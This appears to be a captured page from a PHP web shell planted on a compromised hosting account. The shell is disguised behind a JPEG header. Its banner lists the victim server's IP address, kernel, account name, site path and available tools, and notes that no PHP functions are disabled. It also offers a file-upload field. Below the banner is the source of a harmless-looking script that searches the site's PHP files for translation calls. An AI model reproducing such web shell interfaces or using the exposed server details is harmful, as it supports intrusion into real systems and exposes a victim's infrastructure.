ÿØÿà JFIF ` ` ÿþxØ
| Server IP : 109.234.164.53 / Your IP : 216.73.216.110 Web Server : Apache System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64 User : computer3 ( 1098) PHP Version : 7.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/computer3/litsolide.com/seo-mailing/ |
Upload File : |
<h3>Search error translate</h3>
<?php
function GetListFiles($folder,&$all_files){
$fp=opendir($folder);
while($cv_file=readdir($fp)) {
if(is_file($folder."/".$cv_file)) {
$all_files[]=$folder."/".$cv_file;
}elseif($cv_file!="." && $cv_file!=".." && is_dir($folder."/".$cv_file)){
GetListFiles($folder."/".$cv_file,$all_files);
}
}
closedir($fp);
}
$all_files=array();
GetListFiles(dirname(__FILE__),$all_files);
foreach($all_files as $value){
// echo end(explode(".",end(explode("/",$value))));
if(end(explode(".",end(explode("/",$value)))) == 'php'){
$file = file_get_contents($value);
$lines = explode("\n",$file);
$i=$m=0;
foreach($lines as $v){
$i++;
$regexp_code = "/ _\('/";
//$regexp_code = "/._\('/";
preg_match($regexp_code,$v,$out);
if(isset($out[0])){
if($m==0) echo "<li>".$value."</li>"; $m=1;
echo "Line{$i}:".htmlspecialchars($out[0])."<br>";
}
}
}
}
?>